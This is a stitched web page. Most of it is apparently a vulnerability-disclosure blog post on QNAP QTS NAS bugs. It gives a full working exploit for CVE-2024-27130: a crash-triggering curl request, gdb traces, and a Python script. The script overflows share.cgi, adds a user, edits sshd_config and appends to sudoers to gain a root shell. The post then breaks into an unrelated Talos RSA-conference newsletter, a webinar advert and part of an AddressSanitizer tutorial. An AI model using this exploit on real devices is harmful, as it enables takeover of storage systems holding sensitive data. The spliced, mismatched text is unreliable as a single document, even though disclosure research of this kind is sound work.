Infosec is, at itβs heart, all about that data. Obtaining access to it (or disrupting access to it) is in every ransomware gang and APT groupβs top-10 to-do-list items, and so it makes sense that our research voyage would, at some point, cross paths with products intended to manage - and safeguard - this precious resource.
We speak, ofcourse, of the class of NAS (or βNetwork-Attached Storageβ) devices.
Usually used in multi-user environments such as offices, itβs not difficult to see why these are an attractive target for attackers. Breaching one means the acquisition of lots of juicy sensitive data, shared or otherwise, and the ever-present ransomware threat is so keenly aware of the value that attacking NAS devices provides that strains of malware have been developed specifically for them.
With a codebase bearing some long 10+ year legacy, and a long history of security weaknesses, we thought weβd offer a hand to the QNAP QTS product, by ripping it apart and finding some bugs. This post and analysis covers shared code found in a few different variants of the software:
QTS, the NAS βOSβ itself,
QuTSCloud, the VM-optimized version, and
βQTS heroβ, a version with higher-performance features such as ZFS.
If youβre playing along at home, you can fetch a VM of QuTSCloud from QNAPβs site (we used the verbosely-named βc5.1.7.2739 build 20240419β for our initial analysis, and then used a hardware device to verify exploitation - more on this later). A subscription is pretty cheap and can be bought with short terms - a one-core subscription will cost 5 USD/month and so is great for reversing.
Given the shared-access model of the NAS device, which permits sharing files with specific users, both authenticated and unauthenticated bugs were of interest to us. We found no less than fifteen bugs of varying severity, and weβll be disclosing most of these today (two are still under embargo, so they will have to wait for a later date).
We will, however, be focusing heavily on one in particular - CVE-2024-27130, an unauthenticated stack overflow bug, which allows remote-code execution (albeit with a minor prerequisite). Hereβs a video to whet your appetites:
0:00
/0:25
Spoilers!
Weβll be starting all the way back at βhow we found itβ and concluding all the way at the always-exciting βgetting a shellβ.
First, though, weβll take a high-level look at the NAS (feel free to skip this section if youβre impatient and just want to see some registers set to 0x41414141). With that done, weβll burrow down into some code, find our bug, and ultimately pop a shell. Strap in!
So What Is A NAS, Anyway?
NAS devices are cut-down computers, designed to store and process large amounts of data, usually among team members. Typically, they are heavily optimized for this task, both in hardware (featuring fast IO and networking datapaths) and in software (offering easy ways to share and store data). The multi-user nature of such devices (βOh, Iβll share this document with all the engineers plus Bob from accountingβ) makes for an attractive (to hackers!) threat model.
Itβs tempting to look at these as small devices for small organisations, and while itβs true that they are a great way to convert a few hundred dollars into an easy way to share files in such an environment, it is actually underselling the range of such devices. At the high-end, QNAP offer machines with enterprise features like 100Gb networking and redundant components - these arenβt just device used by small enterprises, they are also used in large, complex environments.
As we alluded to previously, the software on these devices is heavily optimized for data storage and maintenance.
Again, it would be an underestimation to think of these devices as simply βLinux with some management codeβ. While itβs true that QTS is built on a Linux base, it features a surprising array of software, all the way from a web-based UI to things like support for Docker containers.
To manage all this, QTS even has its own βapp storeβ, shown below. Itβs interesting to note that the applications themselves have a history of being buggy - for reasons of time, we concentrated our audit on QTS itself and didnβt look at the applications.
Clearly, thereβs a lot of complexity going on here, and where thereβs complexity, thereβs bugs - especially since the codebase, in some form or another, appears to have been in use for at least ten years (going by historic CVE data).
Peeking Inside The QTS
We pulled down the βcloudβ version of QNAPβs OS, QuTSCloud, which is simply a virtual machine from QNAPβs site. After booting it up and poking around in the web UI, we logged in to the console and took a look around the environment. What we found was an install of Linux, with some middleware exposed via HTTPS, enabling management. All good so far, right? Well, kinda.
So, what language do you think this middleware is written in? PHP? Python? Perl, even? Nope! You might be surprised to learn that itβs written in C, the hackerβs favorite language.
Thereβs some PHP present, although it doesnβt actually execute. Classy.
Taking a look through the installed files reveals a surprising amount of cruft and mess, presumably left over from legacy versions of the software.
There is an instance of Apache listening on port 8080, which seemingly exists only to forward requests to a custom webserver, thttpd, listening on localhost. This custom webserver then calls a variety of CGI scripts (written in C, naturally).
This thttpd is a fun browse, full of surprises:
if ( memcmp(a1->URL, "/cgi-bin/notify.cgi", 0x13uLL) == 0 )
{
if ( strcmp(a1->header_auth, "Basic mjptzqnap209Opo6bc6p2qdtPQ==") != 0 )
{
While this isnβt an actual bug, itβs a βcode smellβ that suggests something weird is going on. What issue was so difficult to fix that the best remediation was a hardcoded (non-base64) authentication string? We can only wonder.
At the start of any rip-it-apart session, thereβs always the thought in the back of our minds; βare we going to find any bugs hereβ, and seeing this kind of thing serves as encouragement.
If you look for them, they will come [out of the woodwork].
If you fuzz them, they will come
Once weβd had a good dig around in the webserver itself, we turned our eyes to the CGI scripts that it executes.
We threw a couple into our favorite disassembler, IDA Pro, and found a few initial bugs - dumb things like the use of sprintf with fixed buffers.
Weβll go into detail about these bugs in a subsequent post, but for now, the relevant point is that most of these early bugs we found were memory corruptions of some kind or another - double frees, overflows, and the like. Given that weβd found so many memory corruption bugs, we thought weβd see if we could find any more simply by throwing long inputs at some CGI functions.
Why bother staring at disassembly when you can python -c "print('A' * 10000)" and get this:
$ curl --insecure https://192.168.228.128/cgi-bin/filemanager/share.cgi -d "ssid=28d86a96a8554c0cac5de8310c5b5ec8&func=get_file_size&total=1&path=/&name=`python -c \\"print('a' * 10000)\\"`"
2024-05-13 23:34:14,143 FATAL [default] CRASH HANDLED; Application has crashed due to [SIGSEGV] signal
2024-05-13 23:34:14,145 WARN [default] Aborting application. Reason: Fatal log at [/root/daily_build/51x_C_01/5.1.x/NasLib/network_management/cpp_lib/easyloggingpp-master/src/easylogging++.h:5583]
A nice juicy segfault! Weβre hitting it from an unauthenticated context, too, although we need to provide a valid ssid parameter (ours came from mutating a legitimate request).
To understand the impact of the bug, we need to know - where can we get this all-important value? Is it something anyone can get hold of, or is it some admin-only session token which makes our bug meaningless in a security context?
Sharing Is Caring
Well, it turns out that it is the identifier given out when a legitimate NAS user elects to βshare a fileβ.
As we mentioned previously, the NAS is designed to work in a multi-user environment, with users sharing files between each other. For this reason, it implements all the user-based file permissions youβd expect - a user could, for example, permit only the βmarketingβ department access to a specific folder. However, it also goes a little further, as it allows files to be shared with users who donβt have an account on the NAS itself. How does it do this? By generating a unique link associated with the target file.
A quick demonstration might be better than trying to explain. Hereβs what a NAS user might do if they want to share a file with a user who doesnβt have a NAS account (for example, an employee at a client organization) - theyβd right-click the file and go to the βshareβ submenu.
As you can see, there are functions to push the generated link via email, or even via a βsocial networkβ. All of these will generate a unique token to identify the link, which has a bunch of properties associated with it - you can set expiry or even require a password for the shared file.
Weβre not interested in these, though, so weβll just create the link. Weβre rewarded with a link that looks like this:
As you can see, the all-important ssid is present, representing all the info about the shared file. Thatβs what we need to trigger our segfault. While this limits the usefulness of the bug a little - true unauthenticated bugs are much more fun! - itβs a completely realistic attack scenario that a NAS user has shared a file with an untrusted user. We can, of course, verify this expectation by turning to a quick-and-dirty google dork, which finds a whole bunch of ssids, verifying our assumption that sharing a file with the entire world is something that is done frequently by NAS users. Great - onward with our bug!
Having verified the bug is accessible anonymously, we dug into the bug with a debugger.
We quickly found that we have control of the all-important RIP register, along with a few others, but since the field that triggers the overflow - the name parameter - is a string, exploitation is made somewhat more complex by our inability to add null bytes to the payload.
Fear not, though - there is an easier route to exploitation, one that doesnβt need us to sidestep this inability!
What if, instead of trying to exploit on arm64-based hardware, with their pesky 64bit addresses and their null bytes, we could exploit on some 32-bit hardware instead? We speak not of 32-bit x86. which it would be difficult to find in the wild, but of an ARM-based system.
ARM-based systems, as you might know, are usually used in embedded devices such as mobile phones, where it is important to minimize power usage while maintaining a high performance-per-watt figure. This sounds ideal for many NAS users, for whom a NAS device simply needs to ferry some data between the network and the disk, without any heavy computation.
QNAP make a number of devices that fit into this category, using ARM processors, and were kind enough to grant us access to an ARM-based device in their internal test environment (!) for us to investigate one of our other issues, so we took a look at it.
[~] # uname -a
Linux [redacted] 4.2.8 #2 SMP Fri Jul 21 05:07:50 CST 2023 armv7l unknown
[~] # grep model /proc/cpuinfo | head -n 1
model name : Annapurna Labs Alpine AL214 Quad-core ARM Cortex-A15 CPU @ 1.70GHz
Wikipedia tells us the ARMv7 uses a 32-bit address space, which will make exploitation a lot easier. Before we jump to exploitation, hereβs the vulnerable pseudocode:
Itβs pretty standard stuff - weβve got a 4104-byte buffer, and if the input to the function (provided by us) begins with a slash, weβll copy the entire input into this 4104-byte buffer, even if it is too long to fit, and weβll overwrite three local variables - delim, returnValue, and then filename. It turns out that weβre in even more luck, as the function stores its return address on the stack (rather than in ARMβs dedicated βLink Registerβ), and so we can take control of the program counter, PC, with a minimum of fuss.
Finally, the module has been compiled without stack cookies, an important mitigation which couldβve made exploitation difficult or even impossible.
At this point, we made the decision to disable ASLR, a key mitigation for memory corruption attacks, in order to demonstrate and share a PoC, while preventing the exploit from being used maliciously.
# echo 0 > /proc/sys/kernel/randomize_va_space
That done, letβs craft some data and see what the target machine ends up.
Program received signal SIGSEGV, Segmentation fault.
0x72e87faa in strspn () from /lib/libc.so.6
(gdb) x/1i $pc
=> 0x72e87faa <strspn+6>: ldrb r5, [r1, #0]
(gdb) info registers r1
r1 0xbeefd00d 3203387405
So weβre trying to dereference this address - 0xbeefd00d - which we supplied. Fair enough - letβs provide a valid pointer instead of the constant. Our input string is located at 0x54140508 in memory (as discovered by x/1s $r8 ) so letβs put that in and re-run.
What happens? Maybe weβll be in luck and itβll be something useful to us.
Program received signal SIGSEGV, Segmentation fault.
0xc0debabc in ?? ()
(gdb) info registers
r0 0xcaffeb0d 3405769485
r1 0x73baf504 1941632260
r2 0x7dff5c00 2113887232
r3 0xcaffeb0d 3405769485
r4 0x540ed8fc 1410259196
r5 0x540ed8fc 1410259196
r6 0x54147fc8 1410629576
r7 0xea7c0de2 3933998562
r8 0x54140508 1410598152
r9 0x1 1
r10 0x0 0
r11 0x0 0
r12 0x73bda880 1941809280
sp 0x7dff5c10 0x7dff5c10
lr 0x73b050f3 1940934899
pc 0xc0debabc 0xc0debabc
cpsr 0x10 16
Oh ho ho ho! Weβre in luck indeed! Not only have we set the all-important PC value to a value of our choosing, but weβve also set r0 and r3 to 0xcaffeb0d, and r7 to 0xea5c0de2.
The stars have aligned to give us an impressive amount of control. As those familiar with ARM will already know, the first four function arguments are typically passed in r0 through r3, and so we can control not only what gets executed (via PC ) but also itβs first argument. A clear path to exploitation is ahead of us - can you see it?
The temptation to set the PC to the system function call is simply too great to resist. All we need do is supply a pointer to our argument in r0 (if you recall, this is 0x54140508 ). Weβll bounce through the following system thunk, found in /usr/lib/libuLinux_config.so.0 :
(gdb) info sharedlibrary libuLinux_config.so.0
From To Syms Read Shared Object Library
0x73af7eb8 0x73bab964 Yes (*) /usr/lib/libuLinux_config.so.0
That address is the start of the .text function, which IDA tells us is at +0x2eeb8, so the real module base is 73ac9000. Adding the 0x2c148 offset to system gives us our ultimate value: 0x73af5148. Weβll slot these into our PoC, set our initial payload to some valid command, and see what happens. Note our use of a bash comment symbol (β#β) to ensure the rest of the line isnβt interpreted by bash.
Finally, since being unprivileged is boring, weβll add an entry to the sudoers config so we can simply assume superuser privileges.
/../../../../bin/echo watchtowr ALL=\\\\(ALL\\\\) ALL >> /usr/etc/sudoers #
Our final exploit, in its entirety:
import argparse
import os
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(prog='PoC', description='PoC for CVE-2024-27130', usage="Obtain an 'ssid' by requesting a NAS user to share a file to you.")
parser.add_argument('host')
parser.add_argument('ssid')
def main(args):
docmd(args, f"/../../../../usr/local/bin/useradd -p \\"$(openssl passwd -6 {parsedArgs.password})\\" watchtowr #".encode('ascii'))
docmd(args, b"/bin/sed -i -e 's/AllowUsers /AllowUsers watchtowr /' /etc/config/ssh/sshd_config # ")
docmd(args, b"/../../../../bin/echo watchtowr ALL=\\\\(ALL\\\\) ALL >> /usr/etc/sudoers # ")
docmd(args, b"/../../../../usr/bin/killall -SIGHUP sshd # ")
def docmd(args, cmd):
print(f"Doing command '{cmd}'")
buf = cmd
buf = buf + b'A' * (4082 - len(buf))
buf = buf + (0x54140508).to_bytes(4, 'little') # delimiter
buf = buf + (0x54140508).to_bytes(4, 'little') # r0 and r3
buf = buf + (0x54140508).to_bytes(4, 'little') #
buf = buf + (0x54140508).to_bytes(4, 'little') # r7
buf = buf + (0x73af5148).to_bytes(4, 'little') # pc
payload = {
'ssid': args.ssid,
'func': 'get_file_size',
'total': '1',
'path': '/',
'name': buf
}
requests.post(
f"https://{args.host}/cgi-bin/filemanager/share.cgi",
verify=False,
data=payload,
timeout=2
)
def makeRandomString():
chars = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"
return "".join(chars[c % len(chars)] for c in os.urandom(8))
parsedArgs = parser.parse_args()
parsedArgs.password = makeRandomString()
main(parsedArgs)
print(f"Created new user OK. Log in with password '{parsedArgs.password}' when prompted.")
os.system(f'ssh watchtowr@{parsedArgs.host}')
Well, almost in its entirety - check out our GitHub repository for the completed PoC and exploit scripts.
Hereβs the all-important root shell picture!
Note: As discussed above, in order to demonstrate and share a PoC, while preventing the exploit from being used maliciously as this vulnerability is unpatched, this PoC relies on a target that has had ASLR manually disabled.
Those of you who practice real-world offensive research, such as red-teamers, may be reeling at the inelegance of our PoC exploit. It is unlikely that such noisy actions as adding a system user and restarting the ssh daemon will go unnoticed by the system administrator!
Remember, though, our aim here is to validate the exploit, not provide a real-world capability (today).
Wrap-Up
So, whatβve we done today?
Well, weβve demonstrated the exploitation of a stack buffer overflow issue in the QNAP NAS OS.
Weβve mentioned that we found fifteen bugs - hereβs a list of them, in brief. Weβve used CVE identifiers where possible, and where not, weβve used our own internal reference number to differentiate the bugs.
As we mentioned before, weβll go into all the gory details of all these bugs in a subsequent post, along with PoC details you can use to verify your exposure.
Bug
Nature
Fix status
Requirements
CVE-2023-50361
Unsafe use of sprintf in getQpkgDir invoked from userConfig.cgi leads to stack buffer overflow and thus RCE
Patched (see text)
Requires valid account on NAS device
CVE-2023-50362
Unsafe use of SQLite functions accessible via parameter addPersonalSmtp to userConfig.cgi leads to stack buffer overflow and thus RCE
Patched (see text)
Requires valid account on NAS device
CVE-2023-50363
Missing authentication allows two-factor authentication to be disabled for arbitrary user
Patched (see text)
Requires valid account on NAS device
CVE-2023-50364
Heap overflow via long directory name when file listing is viewed by get_dirs function of privWizard.cgi leads to RCE
Patched (see text)
Requires ability to write files to the NAS filesystem
CVE-2024-21902
Missing authentication allows all users to view or clear system log, and perform additional actions (details to follow, too much to list here)
Accepted by vendor; no fix available (first reported December 12th 2023)
Requires valid account on NAS device
CVE-2024-27127
A double-free in utilRequest.cgi via the delete_share function
Accepted by vendor; no fix available (first reported January 3rd 2024)
Requires valid account on NAS device
CVE-2024-27128
Stack overflow in check_email function, reachable via the share_file and send_share_mail actions of utilRequest.cgi (possibly others) leads to RCE
Accepted by vendor; no fix available (first reported January 3rd 2024)
Requires valid account on NAS device
CVE-2024-27129
Unsafe use of strcpy in get_tree function of utilRequest.cgi leads to static buffer overflow and thus RCE
Accepted by vendor; no fix available (first reported January 3rd 2024)
Requires valid account on NAS device
CVE-2024-27130
Unsafe use of strcpy in No_Support_ACL accessible by get_file_size function of share.cgi leads to stack buffer overflow and thus RCE
Accepted by vendor; no fix available (first reported January 3rd 2024)
Requires a valid NAS user to share a file
CVE-2024-27131
Log spoofing via x-forwarded-for allows users to cause downloads to be recorded as requested from arbitrary source location
Accepted by vendor; no fix available (first reported January 3rd 2024)
Requires ability to download a file
WT-2023-0050
N/A
Under extended embargo due to unexpectedly complex issue
N/A
WT-2024-0004
Stored XSS via remote syslog messages
No fix available (first reported January 8th 2024)
Requires non-default configuration
WT-2024-0005
Stored XSS via remote device discovery
No fix available (first reported January 8th 2024)
None
WT-2024-0006
Lack of rate-limiting on authentication API
No fix available (first reported January 23rd 2024)
None
WT-2024-00XX
N/A
Under 90-day embargo as per VDP (first reported May 11th 2024)
N/A
The first four of these bugs have patches available. These bugs are fixed in the following products:
However, the remaining bugs still have no fixes available, even after an extended period. Those who are affected by these bugs are advised to consider taking such systems offline, or to heavily restrict access until patches are available.
Weβd like to take this opportunity to preemptively address some concerns that some readers may have regarding our decision to disclose these issues to the public. As we stated previously, many of these issues currently have no fixes available despite the vendor having validated them. You can also see, however, that the vendor has been given ample time to fix these issues, with the most serious issue we discussed today being first reported well over four months ago.
Here at watchTowr, we abide by an industry-standard 90 day period for vendors to respond to issues (as specified in our VDP). We are usually generous in granting extensions to this in unusual circumstances, and indeed, QNAP has received multiple extensions in order to allow remediation.
In cases where there is a clear βblockerβ to remediation - as was the case with WT-2023-0050, for example - we have extended this embargo even further to allow enough time for the vendor to analyze the problem, issue remediation, and for end-users to apply these remediations.
However, there must always be some point at which it is in the interest of the Internet community to disclose issues publicly.
While we are proud of our research ability here at watchTowr, we are by no means the only people researching these attractive targets, and we must be forced to admit the likelihood that unknown threat groups have already discovered the same weaknesses, and are quietly using them to penetrate networks undetected.
This is what drives us to make the decision to disclose these issues despite a lack of remediation. It is hoped that those who store sensitive data on QNAP devices are able to better detect offensive actions when with this information.
Finally, we want to speak a little about QNAPβs response to these bugs.
It is often (correctly) said that vulnerabilities are inevitable, and that what truly defines a vendor is their response. In this department, QNAP were something of a mixed bag.
On one hand, they were very cooperative, and even gave us remote access to their own testing environment so that we could better report a bug - something unexpected that left us with the impression they place the security of their users at a very high priority. However, they took an extremely long time to remediate issues, and indeed, have not completed remediation at the time of publishing.
Hereβs a timeline of our communications so you can get an idea of how the journey to partial remediation went:
Date
Event
Dec 12th 2023
Initial disclosure of CVE-2023-50361 to vendor
Initial disclosure of CVE-2023-50362 to vendor
Initial disclosure of CVE-2023-50363 to vendor
Initial disclosure of CVE-2023-50364 to vendor
Initial disclosure of CVE-2024-21902 to vendor
Jan 3rd 2024
Vendor confirms CVE-2023-50361 through CVE-2023-50364 as valid
Vendor rejects CVE-2024-21902 as βnon-administrator users cannot execute the mentioned actionβ
Jan 5th 2024
watchTowr responds with PoC script to demonstrate CVE-2024-21902
Jan 3rd 2024
Initial disclosure of CVE-2024-27127 to vendor
Initial disclosure of CVE-2024-27128 to vendor
Initial disclosure of CVE-2024-27129 to vendor
Initial disclosure of CVE-2024-27130 to vendor
Initial disclosure of CVE-2024-27131 to vendor
Jan 8th 2024
Initial disclosure of WT-2024-0004 to vendor
Initial disclosure of WT-2024-0005 to vendor
Jan 10th 2024
Vendor once again confirms validity of CVE-2023-50361 through CVE-2023-50364, presumably by mistake
Jan 11th 2024
Vendor requests that watchTowr opens seven new bugs for each function of CVE-2024-21902
Jan 23rd 2024
watchTowr opens new bugs as requested
Initial disclosure of WT-2024-0006 to vendor
Feb 23rd 2024
Vendor assigns CVE-2024-21902 to cover six of the seven new bugs; deems one invalid
Vendor confirms validity of CVE-2023-50361 through CVE-2023-50364 for a third time
Mar 5th 2024
Vendor requests 30-day extension to CVE-2023-50361 through CVE-2023-50364 and CVE-2023-21902; watchTowr grants this extension, asks for confirmation that the vendor can meet the deadline for the other bugs
Mar 11th 2024
Vendor assures us that they will βkeep [us] updated on the progressβ
Apr 3rd 2024
Vendor requests further 14-day extension to CVE-2023-50361 through CVE-2023-50364 and CVE-2023-21902; watchTowr grants this extension
Apr 12th 2024
Vendor requests new disclosure date of April 22nd; watchTowr grants this extension but requests that it be final
April 18th 2024
Vendor confirms CVE-2024-27127
Vendor confirms CVE-2024-27128
Vendor confirms CVE-2024-27129
Vendor confirms CVE-2024-27130
Vendor confirms CVE-2024-27131
Vendor requests βa slight extensionβ for CVE-2024-27127 through CVE-2024-27131
May 2nd 2024
watchTowr declines further extensions, reminding vendor that it has been some 120 days since initial report
May 10th 2024
Initial disclosure of WT-2024-00XX to vendor
However, part of me can empathize with QNAPβs position; they clearly have a codebase with heavy legacy component, and they are working hard to squeeze all the bugs out of it.
Weβll talk more in-depth about the ways theyβre attempting this, and the advantages and disadvantages, in a subsequent blog post, and will also go into detail on the topic of all the other bugs - except those under embargo, WT-2023-0050 and WT-2024-00XX, which will come at a later date, once the embargos expire.
We hope youβll join us for more fun then!
AtΒ watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.
It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.
If you'd like to learn more about theΒ watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.
While I one day wish to make it to the RSA Conference in person, Iβve never had the pleasure of making the trek to San Francisco for one of the largest security conferences in the U.S.Β
Instead, I had to watch from afar and catch up on the internet every day like the common folk. This at least gives me the advantage of not having my day totally slip away from me on the conference floor, so at least I felt like I didnβt miss much in the way of talks, announcements and buzz. So, I wanted to use this space to recap what I felt like the top stories and trends were coming out of RSA last week.Β Β
Hereβs a rundown of some things you may have missed if you werenβt able to stay on top of the things coming out of the conference.Β
AI is the talk of the townΒ
This is unsurprising given how every other tech-focused conference and talk has gone since the start of the year, but everyone had something to say about AI at RSA.Β Β
AI and its associated tools were part of all sorts ofproduct announcements (either to be used as a marketing buzzword or something that is truly adding to the security landscape).Β Β
Ciscoβs own Jeetu Patel gave a keynote on how Cisco Secure is using AI in its newly announced Hypershield product. In the talk, he argued that AI needs to be used natively on networking infrastructure and not as a βbolt-onβ to compete with attackers.Β Β
U.S. Secretary of State Anthony Blinken was the headliner of the week, delivering a talk outlining the U.S.β global cybersecurity policies. He spent a decent chunk of his half hour in the spotlight also talking about AI, in which he warned that the U.S. needed to maintain its edge when it comes to AI and quantum computing β and that losing that race to a geopolitical rival (like China) would have devastating consequences to our national security and economy.Β Β
Individual talks ran the gamut from βAI is the best thing ever for security!β to βOh boy AI is going to ruin everything.β The reality of how this trend shakes out, like most things, is likely going to be somewhere in between those two schools of thought.Β Β
An IBM study released at RSA highlighted how headstrong many executives can be when embracing AI. They found that security is generally an afterthought when creating generative AI models and tools, with only 24 percent of responding C-suite executives saying they have a security component built into their most recent GenAI project.Β Β
Vendors vow to build security into product designsΒ
Sixty-eight new tech companies signed onto a pledge from the U.S. Cybersecurity and Infrastructure Security Agency, vowing to build security into their products from earliest stages of the design process.Β Β
The list of signees now includes Cisco, Microsoft, Google, Amazon Web Services and IBM, among other large tech companies. The pledge states that the signees will work over the next 12 months to build new security safeguards for their products, including increasing the use of multi-factor authentication (MFA) and reducing the presence of default passwords.Β Β
However, thereβs looming speculation about how enforceable the Secure By Design pledge is and what the potential downside here is for any company that doesnβt live up to these promises.Β Β
It can be difficult to detect when users are looking at a digitally manipulated image or video unless theyβre educated on common red flags to look for, or if theyβre particularly knowledgeable on the subject in question. Theyβre getting so good now that even targetsβ parents are falling for fake videos of their loved ones.Β Β
Some potential solutions discussed at RSA include digital βwatermarksβ in things like virtual meetings and video recordings with immutable metadata.Β Β
A deep fake-detecting startup was also named RSAβs βMost Innovative Startup 2024β for its multi-modal software that can detect and alert users of AI-generated and manipulated content. McAfee also has its own Deepfake Detector that it says, βutilizes advanced AI detection models to identify AI-generated audio within videos, helping people understand their digital world and assess the authenticity of content.βΒ
Whether these technologies can keep up with the pace that attackers are developing this technology and deploying it on such a wide scale, remains to be seen.Β Β
The one big thingΒ
Microsoft disclosed a zero-day vulnerability that could lead to an adversary gaining SYSTEM-level privileges as part of its monthly security update. After a hefty Microsoft Patch Tuesday in April, this monthβs security update from the company only included one critical vulnerability across its massive suite of products and services. In all, Mayβs slate of vulnerabilities disclosed by Microsoft included 59 total CVEs, most of which are of βimportantβ severity. There is only one moderate-severity vulnerability.Β
Why do I care?Β
The lone critical security issue is CVE-2024-30044, a remote code execution vulnerability in SharePoint Server. An authenticated attacker who obtains Site Owner permissions or higher could exploit this vulnerability by uploading a specially crafted file to the targeted SharePoint Server. Then, they must craft specialized API requests to trigger the deserialization of that fileβs parameters, potentially leading to remote code execution in the context of the SharePoint Server. The aforementioned zero-day vulnerability, CVE-2024-30051, could allow an attacker to gain SYSTEM-level privileges, which could have devastating impacts if they were to carry out other attacks or exploit additional vulnerabilities.Β
So now what?Β
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63419, 63420, 63422 - 63432, 63444 and 63445. There are also Snort 3 rules 300906 - 300912.Β
Top security headlines of the weekΒ
A massive network intrusion is disrupting dozens of hospitals across the U.S., even forcing some of them to reroute ambulances late last week. Ascension Healthcare Network said it first detected the activity on May 8 and then had to revert to manual systems. The disruption caused some appointments to have to be canceled or rescheduled and kept patients from visiting MyChart, an online portal for medical records. Doctors also had to start taking pen-and-paper records for patients. Ascension operates more than 140 hospitals in 19 states across the U.S. and works with more than 8,500 medical providers. The company has yet to say if the disruption was the result of a ransomware attack or some sort of other targeted cyber attack, though there was no timeline for restoring services as of earlier this week. Earlier this year, a ransomware attack on Change Healthcare disrupted health care systems nationwide, pausing many payments providers were expected to receive. UnitedHealth Group Inc., the parent company of Change, told a Congressional panel recently that it paid a requested ransom of $22 million in Bitcoin to the attackers. (CPO Magazine, The Associated Press)Β
Google and Apple are rolling out new alerts to their mobile operating systems that warn users of potentially unwanted devices tracking their locations. The new features specifically target Bluetooth Low Energy (LE)-enabled accessories that are small enough to often be unknowingly tracking their specific location, such as an Apple AirTag. Android and iOS users will now receive the alert when such a device, when it's been separated from the ownerβs smartphone, is moving with them still. This alert is meant to prevent adversaries or anyone with malicious intentions from unknowingly tracking targetsβ locations. The two companies proposed these new rules for tracking devices a year ago, and other manufacturers of these devices have agreed to add this alert feature to their products going forward. βThis cross-platform collaboration β also an industry first, involving community and industry input β offers instructions and best practices for manufacturers, should they choose to build unwanted tracking alert capabilities into their products,β Apple said in its announcement of the rollout. (Security Week, Apple)Β
The popular Christieβs online art marketplace was still down as of Wednesday afternoon after a suspected cyber attack. The site, known for having many high-profile and wealthy clients, was planning on selling artwork worth at least $578 million this week. Christieβs said it first detected the technology security incident on Thursday but has yet to comment on if it was any sort of targeted cyber attack or data breach. There was also no information on whether client or user data was potentially at risk. Current items for sale included a Vincent van Gogh painting and a collection of rare watches, some owned by Formula 1 star Michael Schumacher. Potential buyers could instead place bids in person or over the phone. (Wall Street Journal, BBC)Β
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on βUsing ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.β Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent.Β Β
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches.Β
Most prevalent malware files from Talos telemetry over the past weekΒ
In this webinar. Horizon3.ai cybersecurity expert Brad Hong covers our new Rapid Response service, including:
β How this service enables you to preemptively defend against high-profile threats
β How our Attack Team develops its tailored threat intelligence for NodeZero users
β Best practices for monitoring the progress of nascent threats and getting ahead of mass exploitation
We understand the unique challenges AppSec teams faceβfrom navigating the rapid pace of development to achieving comprehensive coverage against new vulnerabilities. Thatβs why weβve focused our latest
This post will guide you through using AddressSanitizer (ASan), a compiler plugin that helps developers detect memory issues in code that can lead to remote code execution attacks (such as WannaCry or this WebP implementation bug). ASan inserts checks around memory accesses during compile time, and crashes the program upon detecting improper memory access. It is widely used during fuzzing due to its ability to detect bugs missed by unit testing and its better performance compared to other similar tools.
ASan was designed for C and C++, but it can also be used with Objective-C, Rust, Go, and Swift. This post will focus on C++ and demonstrate how to use ASan, explain its error outputs, explore implementation fundamentals, and discuss ASanβs limitations and common mistakes, which will help you grasp previously undetected bugs.
Finally, we share a concrete example of a real bug we encountered during an audit that was missed by ASan and can be detected with our changes. This case motivated us to research ASan bug detection capabilities and contribute dozens of upstreamed commits to the LLVM project. These commits resulted in the following changes:
ASan can be enabled in LLVMβs Clang and GNU GCC compilers by using the -fsanitize=address compiler and linker flag. The Microsoft Visual C++ (MSVC) compiler supports it via the /fsanitize=address option. Under the hood, the programβs memory accesses will be instrumented with ASan checks and the program will be linked with ASan runtime libraries. As a result, when a memory error is detected, the program will stop and provide information that may help in diagnosing the cause of memory corruption.
Letβs see ASan in practice on a simple buggy C++ program that reads data from an array out of its bounds. Figure 1 shows the code of such a program, and figure 2 shows its compilation, linking, and output when running it, including the error detected by ASan. Note that the program was compiled with debugging symbols and no optimizations (-g3 and -O0 flags) to make the ASan output more readable.
Figure 1: Example program that has an out-of-bounds bug on the stack since it reads the fifth item from the buf array while it has only 4 elements (example.cpp)
Figure 2: Running the program from figure 1 with ASan
When ASan detects a bug, it prints out a best guess of the error type that has occurred, a backtrace where it happened in the code, and other location information (e.g., where the related memory was allocated or freed).
Figure 3: Part of an ASan error message with location in code where related memory was allocated
In this example, ASan detected a heap-buffer overflow (an out-of-bounds read) in the sixth line of the example.cpp file. The problem was that we read the memory of the buf variable out of bounds through the buf[i] code when the loop counter variable (i) had a value of 4.
It is also worth noting that ASan can detect many different types of errors like stack-buffer-overflows, heap-use-after-free, double-free, alloc-dealloc-mismatch, container-overflow, and others. Figures 4 and 5 present another example, where the ASan detects a heap-use-after-free bug and shows the exact location where the related heap memory was allocated and freed.
ASan is built upon two key concepts: shadow memory and redzones. Shadow memory is a dedicated memory region that stores metadata about the applicationβs memory. Redzones are special memory regions placed in between objects in memory (e.g., variables on the stack or heap allocations) so that ASan can detect attempts to access memory outside of the intended boundaries.
Shadow memory
Shadow memory is allocated at a high address of the program, and ASan modifies its data throughout the lifetime of the process. Each byte in shadow memory describes the accessibility status of a corresponding memory chunk that can potentially be accessed by the process. Those memory chunks, typically referred to as βgranules,β are commonly 8 bytes in size and are aligned to their size (the granule size is set in GCC/LLVM code). Figure 6 shows the mapping between granules and process memory.
Figure 6: Logical division of process memory and corresponding shadow memory bytes
